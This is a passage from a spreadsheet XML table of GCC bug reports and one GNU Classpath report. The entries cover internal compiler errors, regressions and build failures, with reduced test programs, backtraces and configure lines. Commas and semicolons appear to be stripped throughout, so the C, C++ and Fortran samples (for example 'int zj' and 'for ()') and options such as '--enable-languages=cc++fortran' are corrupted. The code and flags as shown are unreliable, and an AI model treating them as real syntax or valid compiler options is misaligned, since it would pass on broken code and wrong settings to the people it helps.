pected expression 'int (A::*)()::__pfn' of kind field_decl
   bool b[] = (int (A::*)())0
                            ^
0x73e08f cxx_eval_constant_expression
        ../../gcc/gcc/cp/semantics.c:9787
0x7410d5 cxx_eval_outermost_constant_expr
        ../../gcc/gcc/cp/semantics.c:9807
0x5be3ba check_array_designated_initializer
        ../../gcc/gcc/cp/decl.c:4841
0x5c6f3a maybe_deduce_size_from_array_init
        ../../gcc/gcc/cp/decl.c:4889
0x5c716a check_initializer
        ../../gcc/gcc/cp/decl.c:5714
0x5d99fc cp_finish_decl(tree_node* tree_node* bool tree_node* int)
        ../../gcc/gcc/cp/decl.c:6396
0x6c81bd cp_parser_init_declarator
        ../../gcc/gcc/cp/parser.c:16815
0x6c9979 cp_parser_simple_declaration
        ../../gcc/gcc/cp/parser.c:11205
0x6acc63 cp_parser_block_declaration
        ../../gcc/gcc/cp/parser.c:11086
0x6add81 cp_parser_declaration_statement
        ../../gcc/gcc/cp/parser.c:10733
0x6ae3cb cp_parser_statement
        ../../gcc/gcc/cp/parser.c:9467
0x6af1b9 cp_parser_statement_seq_opt
        ../../gcc/gcc/cp/parser.c:9745
0x6af326 cp_parser_compound_statement
        ../../gcc/gcc/cp/parser.c:9699
0x6c34fb cp_parser_function_body
        ../../gcc/gcc/cp/parser.c:18641
0x6c34fb cp_parser_ctor_initializer_opt_and_function_body
        ../../gcc/gcc/cp/parser.c:18677
0x6c7842 cp_parser_function_definition_after_declarator
        ../../gcc/gcc/cp/parser.c:22792
0x6c86e1 cp_parser_function_definition_from_specifiers_and_declarator
        ../../gcc/gcc/cp/parser.c:22704
0x6c86e1 cp_parser_init_declarator
        ../../gcc/gcc/cp/parser.c:16585
0x6c9979 cp_parser_simple_declaration
        ../../gcc/gcc/cp/parser.c:11205
0x6acc63 cp_parser_block_declaration
        ../../gcc/gcc/cp/parser.c:11086
Please submit a full bug report [etc.]
GCC 3.2.x and GCC 4.1.2 work fine i.e. they produce a decent error message without crashing.</t>
  </si>
  <si>
    <t>GCC-80626</t>
  </si>
  <si>
    <t>[7/8 Regression] Ada x32 multilib build failure for a-cfinve.ads</t>
  </si>
  <si>
    <t>I'm sure this would be trivial to fix if I knew any Ada at all but I've run into this build failure for GCC 7.1.0 when built with --with-multilib=m32m64mx32 for x86_64.
make[9]: Entering directory '/home/steven/gcc-multilib/src/gcc-build/gcc/ada/rts_x32'
[...]
/home/steven/gcc-multilib/src/gcc-build/./gcc/xgcc -B/home/steven/gcc-multilib/src/gcc-build/./gcc/ -B/usr/x86_64-pc-linux-gnu/bin/ -B/usr/x86_64-pc-linux-gnu/lib/ -isystem /usr/x86_64-pc-linux-gnu/include -isystem /usr/x86_64-pc-linux-gnu/sys-include    -c -g -O2 -mx32 -fpic  -W -Wall -gnatpg -nostdinc -mx32  a-cfinve.adb -o a-cfinve.o
a-cfinve.ads:245:04: warning: in instantiation at a-coboho.adb:55
a-cfinve.ads:245:04: warning: types for unchecked conversion have different sizes
make[9]: *** [../gcc-interface/Makefile:296: a-cfinve.o] Error 1
Any ideas?</t>
  </si>
  <si>
    <t>GCC-54714</t>
  </si>
  <si>
    <t>ICE on invalid expression involving DT with allocatable components and constructor in I/O</t>
  </si>
  <si>
    <t>Hi
following code:
program foo
   type :: na_var
      integer allocatable dimension(:) :: x
   end type na_var
   write(**) na_var([22])
end
gives ICE with 
xarth@janus01 ~ $ gfortran -v
Using built-in specs.
COLLECT_GCC=/usr/x86_64-pc-linux-gnu/gcc-bin/4.8.0-pre9999/gfortran
COLLECT_LTO_WRAPPER=/usr/libexec/gcc/x86_64-pc-linux-gnu/4.8.0-pre9999/lto-wrapper
Target: x86_64-pc-linux-gnu
Configured with: /var/tmp/portage/sys-devel/gcc-4.8.0_pre9999/work/gcc-4.8.0-9999/configure --prefix=/usr --bindir=/usr/x86_64-pc-linux-gnu/gcc-bin/4.8.0-pre9999 --includedir=/usr/lib/gcc/x86_64-pc-linux-gnu/4.8.0-pre9999/include --datadir=/usr/share/gcc-data/x86_64-pc-linux-gnu/4.8.0-pre9999 --mandir=/usr/share/gcc-data/x86_64-pc-linux-gnu/4.8.0-pre9999/man --infodir=/usr/share/gcc-data/x86_64-pc-linux-gnu/4.8.0-pre9999/info --with-gxx-include-dir=/usr/lib/gcc/x86_64-pc-linux-gnu/4.8.0-pre9999/include/g++-v4 --host=x86_64-pc-linux-gnu --build=x86_64-pc-linux-gnu --disable-altivec --disable-fixed-point --without-ppl --without-cloog --enable-lto --enable-nls --without-included-gettext --with-system-zlib --enable-obsolete --disable-werror --enable-secureplt --enable-multilib --with-multilib-list=m32m64 --enable-libmudflap --disable-libssp --enable-libgomp --with-python-dir=/share/gcc-data/x86_64-pc-linux-gnu/4.8.0-pre9999/python --enable-checking=yes --disable-libgcj --enable-languages=cc++fortran --enable-shared --enable-threads=posix --enable-__cxa_atexit --enable-clocale=gnu --enable-targets=all --with-bugurl=http://bugs.gentoo.org/ --with-pkgversion='Gentoo 4.8.0_pre9999'
Thread model: posix
gcc version 4.8.0-pre9999 20120922 (experimental) commit f09a218261ba473738ad45f2c643957523019a17 (Gentoo 4.8.0_pre9999)
For the reference this bug is a variation of PR41859</t>
  </si>
  <si>
    <t>xarthisius.kk</t>
  </si>
  <si>
    <t>GCC-13732</t>
  </si>
  <si>
    <t>[3.3/3.4/4.0 Regression] internal compiler error with structures with VLAs and functions inside functions</t>
  </si>
  <si>
    <t>I'v got an internal compiler error when compiling this :
// test.c
#include 
void algo_fourmis(int nombre_points)
{
typedef struct
{
short memoire[nombre_points+1]
char bann_list[nombre_points+1]
} fourmi
fourmi *creation_fourmi(int nombre_points)
{
int i
fourmi *f
f = ( fourmi *) malloc(sizeof(fourmi))
for (i=0i&lt;=nombre_pointsi++)
	f-&gt;bann_list[i]=0
return f
}
}
// end
I don't realy know if this is valid c code but I have no problems compiling it
with gcc 2.95
but with all version 3.x.x I tried ( 3.0.4 3.3.0 3.3.1 ) it fails.
$ gcc -Wall -c g.c
test.c: In function `creation_fourmi':
test.c:15: internal compiler error: in expand_expr at expr.c:6933
Please submit a full bug report
with preprocessed source if appropriate.</t>
  </si>
  <si>
    <t>sylvain</t>
  </si>
  <si>
    <t>GCC-51774</t>
  </si>
  <si>
    <t>[4.7 Regression] FAIL: gcc.dg/lto/trans-mem-* c_lto_trans-mem-1_0.o-c_lto_trans-mem-1_1.o link -flto -fgnu-tm</t>
  </si>
  <si>
    <t>Between revisions 182934 and 182937 the tests gcc.dg/lto/trans-mem-* have started to fail (see http://gcc.gnu.org/ml/gcc-regression/2012-01/msg00117.html ). The failures are
Executing on host: /opt/gcc/build_w/gcc/xgcc -B/opt/gcc/build_w/gcc/ c_lto_trans-mem-1_0.o c_lto_trans-mem-1_1.o   -flto -fgnu-tm       -m32 -o gcc-dg-lto-trans-mem-1-01.exe    (timeout = 300)
:0:0: warning: 'returns_twice' attribute directive ignored [-Wattributes]
:0:0: warning: 'returns_twice' attribute directive ignored [-Wattributes]
output is:
:0:0: warning: 'returns_twice' attribute directive ignored [-Wattributes]
:0:0: warning: 'returns_twice' attribute directive ignored [-Wattributes]
FAIL: gcc.dg/lto/trans-mem-1 c_lto_trans-mem-1_0.o-c_lto_trans-mem-1_1.o link -flto -fgnu-tm
UNRESOLVED: gcc.dg/lto/trans-mem-1 c_lto_trans-mem-1_0.o-c_lto_trans-mem-1_1.o execute -flto -fgnu-tm</t>
  </si>
  <si>
    <t>GCC-70795</t>
  </si>
  <si>
    <t>[7 Regression] gcc/libjava/interpret.cc:1948:1: ICE: in binds_to_current_def_p at symtab.c:2232</t>
  </si>
  <si>
    <t>libtool: compile:  /test/gnu/gcc/objdir/./gcc/xgcc -shared-libgcc -B/test/gnu/gcc/objdir/./gcc -nostdinc++ -L/test/gnu/gcc/objdir/hppa2.0w-hp-hpux11.11/libstdc+
+-v3/src -L/test/gnu/gcc/objdir/hppa2.0w-hp-hpux11.11/libstdc++-v3/src/.libs -L/test/gnu/gcc/objdir/hppa2.0w-hp-hpux11.11/libstdc++-v3/libsupc++/.libs -B/opt/gnu/gcc/gcc-7/hppa2.0w-hp-hpux11.11/bin/ -B/opt/gnu/gcc/gcc-7/hppa2.0w-hp-hpux11.1
1/lib/ -isystem /opt/gnu/gcc/gcc-7/hppa2.0w-hp-hpux11.11/include -isystem /opt/gnu/gcc/gcc-7/hppa2.0w-hp-hpux11.11/sys-include -DHAVE_CONFIG_H -I. -I../../../gcc/libjava -I./include -I./gcj -I../../../gcc/libjava -Iinclude -I../../../gcc/li
bjava/include -I../../../gcc/libjava/classpath/include -Iclasspath/include -I../../../gcc/libjava/classpath/native/fdlibm -I../../../gcc/libjava/../boehm-gc/include -I../boehm-gc/include -I../../../gcc/libjava/libltdl -I../../../gcc/libjava
/libltdl -I../../../gcc/libjava/.././libjava/../libgcc -I../../../gcc/libjava/../zlib -I../../../gcc/libjava/../libffi/include -I../libffi/include -fno-rtti -fnon-call-exceptions -pthread -fdollars-in-identifiers -Wswitch-enum -D_FILE_OFFSE
T_BITS=64 -Wextra -Wall -D_GNU_SOURCE -DPREFIX=\/opt/gnu/gcc/gcc-7\ -DTOOLEXEC
LIBDIR=\/opt/gnu/gcc/gcc-7/lib\ -DJAVA_HOME=\/opt/gnu/gcc/gcc-7\ -DBOOT_CLAS
S_PATH=\/opt/gnu/gcc/gcc-7/share/java/libgcj-7.0.0.jar\ -DJAVA_EXT_DIRS=\/opt
/gnu/gcc/gcc-7/share/java/ext\ -DGCJ_ENDORSED_DIRS=\/opt/gnu/gcc/gcc-7/share/j
ava/gcj-endorsed\ -DGCJ_VERSIONED_LIBDIR=\/opt/gnu/gcc/gcc-7/lib/gcj-7.0.0-17\
 -DPATH_SEPARATOR=\:\ -DECJ_JAR_FILE=\\ -DLIBGCJ_DEFAULT_DATABASE=\/opt/gn
u/gcc/gcc-7/lib/gcj-7.0.0-17/classmap.db\ -DLIBGCJ_DEFAULT_DATABASE_PATH_TAIL=\
gcj-7.0.0-17/classmap.db\ -fwrapv -g -O2 -MT interpret.lo -MD -MP -MF .deps/in
terpret.Tpo -c ../../../gcc/libjava/interpret.cc  -fPIC -DPIC -o .libs/interpret.o
_GLOBAL__I_65535_0_.._.._.._gcc_libjava_interpret.cc_E29B42DF_0x4efdcb59/1100 () @7aeeb5e8
  Type: function definition analyzed
  Visibility: force_output public artificial constructor
  References: 
  Referring: 
  Availability: available
  First run: 0
  Function flags: body static_constructor (priority:65535)
  Called by: 
  Calls: _GLOBAL__sub_I_interpret.cc/861 (1.00 per call) 
../../../gcc/libjava/interpret.cc: In function '':
../../../gcc/libjava/interpret.cc:1948:1: internal compiler error: in binds_to_current_def_p at symtab.c:2232
 }
 ^
This is revision 235394.</t>
  </si>
  <si>
    <t>GCC-13655</t>
  </si>
  <si>
    <t>ranlib is needed on HP-UX 11.11 - error in mh-unix</t>
  </si>
  <si>
    <t>In config/mh-hpux variable RANLIB is set to true to indicate that it is not 
needed. On HP-UX 11.11 using gcc 3.3 to compile gcc 3.3.2 and ar from binutils 
2.14 this doesn't work. ld complains about an invalid magic number. Ranlib 
exists on this system (/bin/ranlib) and is necessary to run. 
Configure indicates that ranlib is found (Output: checking for ranlib ... 
ranlib) but mh-frag overwrites it by true. I can't understand why this is 
done because configure is usally the program to determine wether ranlib exists 
or not.
If it's important wether running ranlib is necessary or not I like to 
recommend to drop a line about this task in the INSTALL help. It took me a very 
long time to find this error because google find a large number of pages 
for invalid magic number error: probably 64 bit library - but no hint 
concerning ranlib...</t>
  </si>
  <si>
    <t>carsten.traebing</t>
  </si>
  <si>
    <t>GCC-32083</t>
  </si>
  <si>
    <t>[4.3 Regression] bug in transfer integer-&gt;real-&gt;integer</t>
  </si>
  <si>
    <t>Hi
It seems the current gfortran version has a bug when the transfer() function is called on a parameter holding the bitpattern corresponding to the -Infinite value.
If a variable with this pattern is transferred from integer-&gt;real-&gt;integer the result is just the input. However when a parameter is transferred in this way the sign gets reversed and the bitpattern for -Infinite is changed into the bit pattern for +Infinite.
I used the following sample code to test this:
PROGRAM TestInfinite
  IMPLICIT NONE
  integer parameter :: i8_ = Selected_Int_Kind(18)  ! = integer*8
  integer parameter :: r8_ = Selected_Real_Kind(15307)  ! = real*8
  integer(i8_) parameter :: bit_pattern_PosInf_i8_p = 9218868437227405312_i8_
  integer(i8_) parameter :: bit_pattern_NegInf_i8_p = -4503599627370496_i8_
  integer(i8_) :: bit_pattern_PosInf_i8 = 9218868437227405312_i8_
  integer(i8_) :: bit_pattern_NegInf_i8 = -4503599627370496_i8_
  integer(i8_) :: bit_pattern_PosInf_i8_hex
  integer(i8_) :: bit_pattern_NegInf_i8_hex
  integer(i8_) :: i
  real(r8_)    :: r
  data bit_pattern_PosInf_i8_hex /z'7FF0000000000000'/
  !data bit_pattern_NegInf_i8_hex /z'FFF0000000000000'/
  ! not portable replaced by:
  bit_pattern_NegInf_i8_hex = ibset(bit_pattern_PosInf_i8_hex63)
  print *testing the values
  print *bit_pattern_NegInf_i8_hex = bit_pattern_NegInf_i8_hex
  print *bit pattern NegInf_i8     = bit_pattern_NegInf_i8
  print *bit_pattern_PosInf_i8_hex = bit_pattern_PosInf_i8_hex
  print *bit pattern PosInf_i8     = bit_pattern_PosInf_i8
  print *testing the variable transfers
  print *i = bit_pattern_PosInf_i8
  r = transfer(bit_pattern_PosInf_i8r)
  print *r = r
  i = transfer(ri)
  print *i = i
  print *i = bit_pattern_NegInf_i8
  r = transfer(bit_pattern_NegInf_i8r)
  print *r = r
  i = transfer(ri)
  print *i = i
  print *testing the parameter transfers
  print *i = bit_pattern_PosInf_i8_p
  r = transfer(bit_pattern_PosInf_i8_pr)
  print *r = r
  i = transfer(ri)
  print *i = i
  print *i = bit_pattern_NegInf_i8_p
  r = transfer(bit_pattern_NegInf_i8_pr)
  print *r = r
  i = transfer(ri)
  print *i = i
END PROGRAM TestInfinite
This program generates the following output on my machine:
12:11pm bhw034 72 &gt;TestInf
 testing the values
 bit_pattern_NegInf_i8_hex =     -4503599627370496
 bit pattern NegInf_i8     =     -4503599627370496
 bit_pattern_PosInf_i8_hex =   9218868437227405312
 bit pattern PosInf_i8     =   9218868437227405312
 testing the variable transfers
 i =   9218868437227405312
 r =                +Infinity
 i =   9218868437227405312
 i =     -4503599627370496
 r =                -Infinity
 i =     -4503599627370496
 testing the parameter transfers
 i =   9218868437227405312
 r =                +Infinity
 i =   9218868437227405312
 i =     -4503599627370496
 r =                +Infinity
 i =   9218868437227405312
12:11pm bhw034 73 &gt;
The gfortran version used for testing was:
gfortran -v
Using built-in specs.
Target: i386-pc-linux-gnu
Configured with: /home/fxcoudert/gfortran_nightbuild/trunk/configure --prefix=/home/fxcoudert/gfortran_nightbuild/irun-20070525 --enable-languages=cfortran --build=i386-pc-linux-gnu --enable-checking=release --with-gmp=/home/fxcoudert/gfortran_nightbuild/software
Thread model: posix
gcc version 4.3.0 20070525 (experimental)
best regards
Jos de Kloe</t>
  </si>
  <si>
    <t>kloedej</t>
  </si>
  <si>
    <t>GCC-65593</t>
  </si>
  <si>
    <t>[5 Regression] internal compiler error: in extract_insn at recog.c:2343</t>
  </si>
  <si>
    <t>On Linux/x86-64 r221697 gave:
[hjl@gnu-35 gcc-test-spec]$ ./usr/bin/gcc -S -fPIE -O2 -o /tmp/x.s src-trunk/gcc/testsuite/gcc.c-torture/compile/pr20928.c
src-trunk/gcc/testsuite/gcc.c-torture/compile/pr20928.c: In function \u2018foo\u2019:
src-trunk/gcc/testsuite/gcc.c-torture/compile/pr20928.c:10:1: error: unrecognizable insn:
 }
 ^
(insn 7 6 8 2 (set (reg/f:DI 88)
        (plus:DI (symbol_ref:DI (bar) [flags 0x40] )
            (reg:DI 89))) src-trunk/gcc/testsuite/gcc.c-torture/compile/pr20928.c:8 -1
     (expr_list:REG_EQUAL (const:DI (plus:DI (symbol_ref:DI (bar) [flags 0x40] )
                (const_int 2147483648 [0x80000000])))
        (nil)))
src-trunk/gcc/testsuite/gcc.c-torture/compile/pr20928.c:10:1: internal compiler error: in extract_insn at recog.c:2343
0xa9a2c8 _fatal_insn(char const* rtx_def const* char const* int char const*)
	../../src-trunk/gcc/rtl-error.c:110
0xa9a2f9 _fatal_insn_not_found(rtx_def const* char const* int char const*)
	../../src-trunk/gcc/rtl-error.c:118
0xa68659 extract_insn(rtx_insn*)
	../../src-trunk/gcc/recog.c:2343
0x86d1f3 instantiate_virtual_regs_in_insn
	../../src-trunk/gcc/function.c:1598
0x86d1f3 instantiate_virtual_regs
	../../src-trunk/gcc/function.c:1966
0x86d1f3 execute
	../../src-trunk/gcc/function.c:2015
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
[hjl@gnu-35 gcc-test-spec]$</t>
  </si>
  <si>
    <t>GCC-60484</t>
  </si>
  <si>
    <t>[4.7/4.8/4.9 Regression] -fdump-rtl-expand and attribute optimize gives incorrect dump file path</t>
  </si>
  <si>
    <t>Created attachment 32324
test.c - Source to trigger the bug
To trigger this bug three conditions must be met:
- At least one function must be annotated with __attribute__((optimize)).
- The object file is placed in a sub-directory to where the source file is located.
- The flag -fdump-rtl-expand is used.
The path to the directory where the dump file is supposed to be saved is prepended the same number of times as there are functions with attribute optimize in the source C file.
Compiler output:
$ gcc -std=c99 -fdump-rtl-expand -o objs/test.o -c test.c
test.c: In function â€˜Optimized_1â€™:
test.c:3:1: error: could not open dump file â€˜objs/objs/objs/test.c.166r.expandâ€™: No such file or directory
Optimized_1(int arg)
 ^
test.c: In function â€˜Optimized_2â€™:
test.c:10:1: error: could not open dump file â€˜objs/objs/objs/test.c.166r.expandâ€™: No such file or directory
Optimized_2(int arg)
 ^
test.c: In function â€˜mainâ€™:
test.c:15:5: error: could not open dump file â€˜objs/objs/objs/test.c.166r.expandâ€™: No such file or directory
 int main()
     ^
Compiler version:
$ gcc -v
Using built-in specs.
COLLECT_GCC=gcc
COLLECT_LTO_WRAPPER=/usr/local/lib/gcc/x86_64-unknown-linux-gnu/4.8.2/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: ./configure
Thread model: posix
gcc version 4.8.2 (GCC)
System type:
$ uname -a
Linux jf-linux 3.4.63-2.44-desktop #1 SMP PREEMPT Wed Oct 2 11:18:32 UTC 2013 (d91a619) x86_64 x86_64 x86_64 GNU/Linux</t>
  </si>
  <si>
    <t>secondary.mail7865220</t>
  </si>
  <si>
    <t>GCC-6613</t>
  </si>
  <si>
    <t>Problem with RTX_UNCHANGING_P (again)</t>
  </si>
  <si>
    <t>The code below produces garbage.
But compiling without -O2 or with -DREMOVE_CTOR or -DUSE_INT
will work-around the problem.
--jc
----------------------------
#include 
struct logic
        {
        enum state_value { LO HI DC Z NVL }
        logic(state_value l = NVL)
                : state(l) { }
#ifndef REMOVE_CTOR
        logic(const logic &amp;l)
                : state(l.state) { }
#endif
#ifdef USE_INT
        int state
#else
        char state
#endif
        }
const logic  LO(logic::LO)
const logic  HI(logic::HI)
void func(void)
int
main()
        {
        func()
        return 0
        }
struct addtab
        {
        logic sum
        logic carry
        }
const struct addtab ADDTABLE[] =
        {
        {LOLO}
        {HILO}
        {HILO}
        {LOHI}
        {HILO}
        {LOHI}
        {LOHI}
        {HIHI}
        }
void
func(void)
        {
        for (int tmp = 0 tmp &lt; 8 ++tmp)
                {
                std::cout &lt;&lt; (int)ADDTABLE[tmp].sum.state
                          &lt;&lt; 
                          &lt;&lt; (int)ADDTABLE[tmp].carry.state
                          &lt;&lt; std::endl
                }
        }
Release:
Verified on 3.1 3.0.4 3.0.2 20011002 by Jakub Jelinek
Environment:
Debian/GNU-Linux IA-32 gcc 3.1
How-To-Repeat:
g++ -O2 file.cc</t>
  </si>
  <si>
    <t>jching</t>
  </si>
  <si>
    <t>GCC-4080</t>
  </si>
  <si>
    <t>GCC 3.0.1 doesn't give proper warnings on C++ style declarations</t>
  </si>
  <si>
    <t xml:space="preserve">	When compiling a program like this GCC doesn't warn about the C++
	style declarations in the C code without -Wall and it does warn
	but incorrectly when -Wall is turned on.
Release:
3.0.1
Environment:
System: Linux orthanc 2.4.8-ac1 #3 Sun Aug 12 00:11:33 CDT 2001 i586 unknown
Architecture: i586
cpu: AMD K6-2 400
libc: GNU Libc 2.2.3
host: i586-pc-linux-gnu
build: i586-pc-linux-gnu
target: i586-pc-linux-gnu
configured with: ../gcc-3.0.1/configure --prefix=/usr --with-gxx-include-dir=/usr/include/g++ --enable-shared --enable-languages=cc++f77
How-To-Repeat:
	Example code:
	int
	main (int argc char **argv)
	{
		int bla
		bla = 1
		int bla2 = 2
		return 1
	}
	Output with -Wall:
	bla.c: In function `main':
	bla.c:6 warning: unused variable `bla2'
Unformatted:
 in C code.</t>
  </si>
  <si>
    <t>jorn</t>
  </si>
  <si>
    <t>CLASSPATH-26498</t>
  </si>
  <si>
    <t>jtextfield: wrong trigger location for selection in non-left aligned textfields</t>
  </si>
  <si>
    <t>When a textfield is right or center aligned have some text in it and use the mouse to select the text it reacts on the wrong location eg.
right-aligned:
                 hello
 ^^^^^ - click here to select the 'hello'
center-aligned:
        hello         
    ^^^^^ - click here to select the 'hello'
Obviously the textfield should only react to clicks on the location where the text really is.</t>
  </si>
  <si>
    <t>GCC-47639</t>
  </si>
  <si>
    <t>[4.5 Regression] ICE: verify_stmts failed: statement marked for throw but doesn't with -fstack-check=generic -fexceptions -fnon-call-exceptions</t>
  </si>
  <si>
    <t>Created attachment 23272
reduced testcase
Compiler output:
$ gcc -fstack-check=generic -fexceptions -fnon-call-exceptions testcase.c 
testcase.c: In function 'foo':
testcase.c:7:1: error: statement marked for throw but doesn't
D.2691_8 = {D.2701_15 D.2704_18}
testcase.c:7:1: internal compiler error: verify_stmts failed
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Tested revisions:
r169824 - crash
r169519 - crash
4.5 r168785 - crash
4.4 r168785 - OK</t>
  </si>
  <si>
    <t>GCC-59097</t>
  </si>
  <si>
    <t>[4.7/4.8/4.9 Regression] ICE with invalid statement expression as array size</t>
  </si>
  <si>
    <t>The following invalid code snippet triggers an ICE since GCC 4.6.0:
============================
void foo()
{
  int x[({ return })]
}
============================
bug.cc: In function 'void foo()':
bug.cc:3:22: internal compiler error: Segmentation fault
   int x[({ return })]
                      ^
0xb2bf3f crash_signal
        ../../gcc/gcc/toplev.c:334
0x6dac34 cxx_eval_constant_expression
        ../../gcc/gcc/cp/semantics.c:9350
0x6db91b cxx_eval_constant_expression
        ../../gcc/gcc/cp/semantics.c:9453
0x6de4d6 cxx_eval_outermost_constant_expr
        ../../gcc/gcc/cp/semantics.c:9725
0x6e119b maybe_constant_value(tree_node*)
        ../../gcc/gcc/cp/semantics.c:9835
0x567450 compute_array_index_type(tree_node* tree_node* int)
        ../../gcc/gcc/cp/decl.c:8227
0x589075 create_array_type_for_decl
        ../../gcc/gcc/cp/decl.c:8540
0x589075 grokdeclarator(cp_declarator const* cp_decl_specifier_seq* decl_context int tree_node**)
        ../../gcc/gcc/cp/decl.c:9486
0x58d8f4 start_decl(cp_declarator const* cp_decl_specifier_seq* int tree_node* tree_node* tree_node**)
        ../../gcc/gcc/cp/decl.c:4469
0x6664a2 cp_parser_init_declarator
        ../../gcc/gcc/cp/parser.c:16567
0x667edf cp_parser_simple_declaration
        ../../gcc/gcc/cp/parser.c:11107
0x64bdf0 cp_parser_block_declaration
        ../../gcc/gcc/cp/parser.c:10988
0x64cf13 cp_parser_declaration_statement
        ../../gcc/gcc/cp/parser.c:10635
0x64d587 cp_parser_statement
        ../../gcc/gcc/cp/parser.c:9376
0x64e289 cp_parser_statement_seq_opt
        ../../gcc/gcc/cp/parser.c:9654
0x64e3fe cp_parser_compound_statement
        ../../gcc/gcc/cp/parser.c:9608
0x661a8b cp_parser_function_body
        ../../gcc/gcc/cp/parser.c:18461
0x661a8b cp_parser_ctor_initializer_opt_and_function_body
        ../../gcc/gcc/cp/parser.c:18497
0x665e8f cp_parser_function_definition_after_declarator
        ../../gcc/gcc/cp/parser.c:22520
0x666c62 cp_parser_function_definition_from_specifiers_and_declarator
        ../../gcc/gcc/cp/parser.c:22441
Please submit a full bug report [etc.]
A slightly different testcase produces a different ICE:
============================
void foo()
{
  int x[({ L:  })]
}
============================
bug.cc: In function 'void foo()':
bug.cc:3:19: internal compiler error: unexpected expression '' of kind label_expr
   int x[({ L:  })]
                   ^
0x6db55d cxx_eval_constant_expression
        ../../gcc/gcc/cp/semantics.c:9705
0x6de4d6 cxx_eval_outermost_constant_expr
        ../../gcc/gcc/cp/semantics.c:9725
0x6e119b maybe_constant_value(tree_node*)
        ../../gcc/gcc/cp/semantics.c:9835
0x567450 compute_array_index_type(tree_node* tree_node* int)
        ../../gcc/gcc/cp/decl.c:8227
0x589075 create_array_type_for_decl
        ../../gcc/gcc/cp/decl.c:8540
0x589075 grokdeclarator(cp_declarator const* cp_decl_specifier_seq* decl_context int tree_node**)
        ../../gcc/gcc/cp/decl.c:9486
0x58d8f4 start_decl(cp_declarator const* cp_decl_specifier_seq* int tree_node* tree_node* tree_node**)
        ../../gcc/gcc/cp/decl.c:4469
0x6664a2 cp_parser_init_declarator
        ../../gcc/gcc/cp/parser.c:16567
0x667edf cp_parser_simple_declaration
        ../../gcc/gcc/cp/parser.c:11107
0x64bdf0 cp_parser_block_declaration
        ../../gcc/gcc/cp/parser.c:10988
0x64cf13 cp_parser_declaration_statement
        ../../gcc/gcc/cp/parser.c:10635
0x64d587 cp_parser_statement
        ../../gcc/gcc/cp/parser.c:9376
0x64e289 cp_parser_statement_seq_opt
        ../../gcc/gcc/cp/parser.c:9654
0x64e3fe cp_parser_compound_statement
        ../../gcc/gcc/cp/parser.c:9608
0x661a8b cp_parser_function_body
        ../../gcc/gcc/cp/parser.c:18461
0x661a8b cp_parser_ctor_initializer_opt_and_function_body
        ../../gcc/gcc/cp/parser.c:18497
0x665e8f cp_parser_function_definition_after_declarator
        ../../gcc/gcc/cp/parser.c:22520
0x666c62 cp_parser_function_definition_from_specifiers_and_declarator
        ../../gcc/gcc/cp/parser.c:22441
0x666c62 cp_parser_init_declarator
        ../../gcc/gcc/cp/parser.c:16472
0x667edf cp_parser_simple_declaration
        ../../gcc/gcc/cp/parser.c:11107
Please submit a full bug report [etc.]</t>
  </si>
  <si>
    <t>GCC-53061</t>
  </si>
  <si>
    <t>[C/ObjC/C++/ObjC++] cleanup diagnostics initialization</t>
  </si>
  <si>
    <t>Created attachment 27212
patch
See http://gcc.gnu.org/ml/gcc-patches/2012-04/msg00443.html and other emails in that thread.
My latest patch is attached.
Changelog is:
2012-04-09  Manuel LÃ³pez-IbÃ¡Ã±ez  
        * doc/invoke.texi (fmessage-length): Update.
        * pretty-print.h (getenv_columns): New.
        * c-objc-common.c (c_objc_common_init): Do not do diagnostics
        initialization here.
c-family/
        * c-opts.c (c_common_initialize_diagnostics): Rename as
        c_common_diagnostics_defaults. Set defaults here.
        * c-common.h (c_common_initialize_diagnostics): Likewise.
cp/
        * cp-objcp-common.c (cxx_initialize_diagnostics): Move from
        here to ...
        * error.c: ... here.
        (init_error): Delete.
        * cp-tree.h (init_error): Delete.
        * lex.c (cxx_init): Do not call init_error.
        * cxx-pretty-print.c (pp_cxx_pretty_printer_init): Do not set
        default message length here.
I prefer to focus on other things so feel free to take it and do whatever you need to get it approved.</t>
  </si>
  <si>
    <t>GCC-71031</t>
  </si>
  <si>
    <t>[6 Regression] ICE in extract_range_from_binary_expr_1 at tree-vrp.c:2535 w/ -Os</t>
  </si>
  <si>
    <t>gcc-7.0.0-alpha20160508 snapshot ICEs when compiling the following reduced testcase w/ -Os:
int zj
int **yr
void
nn (void)
{
  unsigned int od = 4
  for ()
    {
      int lk
      for (lk = 0 lk &lt; 2 ++lk)
        {
          static int cm
          zj = 0
          if (od == 0)
            return
          ++od
          for (cm = 0 cm &lt; 2 ++cm)
            {
              --od
              **yr = 0
            }
        }
    }
}
% gcc-7.0.0-alpha20160508 -c -Os z5y81wfl.c                            
z5y81wfl.c: In function 'nn':
z5y81wfl.c:5:1: internal compiler error: in extract_range_from_binary_expr_1 at tree-vrp.c:2535
 nn (void)
 ^~</t>
  </si>
  <si>
    <t>GCC-39692</t>
  </si>
  <si>
    <t>f95: conflict between EXTERNAL and POINTER</t>
  </si>
  <si>
    <t>In the Fortran95 standard section 5.1 one finds:
Constraint: If the POINTER attribute is specified the TARGET INTENT EXTERNAL or INTRINSIC attribute shall not be specified.
Thus the following should be rejected with -std=f95:
 external f
 pointer f
And consequently also something like this:
function f()
 intrinsic sin
 external f
 pointer f
 real f
! ICE without the following line
! strange error with that line
!  f =&gt; sin
end function f</t>
  </si>
  <si>
    <t>GCC-39013</t>
  </si>
  <si>
    <t>[4.3 Regression] Missing @PLT when -fpie is used</t>
  </si>
  <si>
    <t>http://bugs.gentoo.org/show_bug.cgi?id=254355
We are using patched gcc but it fail on gentoo's default compiler's to.
It works fine with GCC 4.2.4 and lower.
The fail file is part of libnet
the symbol that miss the @PLT is libnet_getgre_length
it sould have @PLT as the rest of the symbols
If i compile the fail file with -pic instead i compiles fine.
and have @PLT added 
gcc version 4.3.3
Target: x86_64-pc-linux-gnu
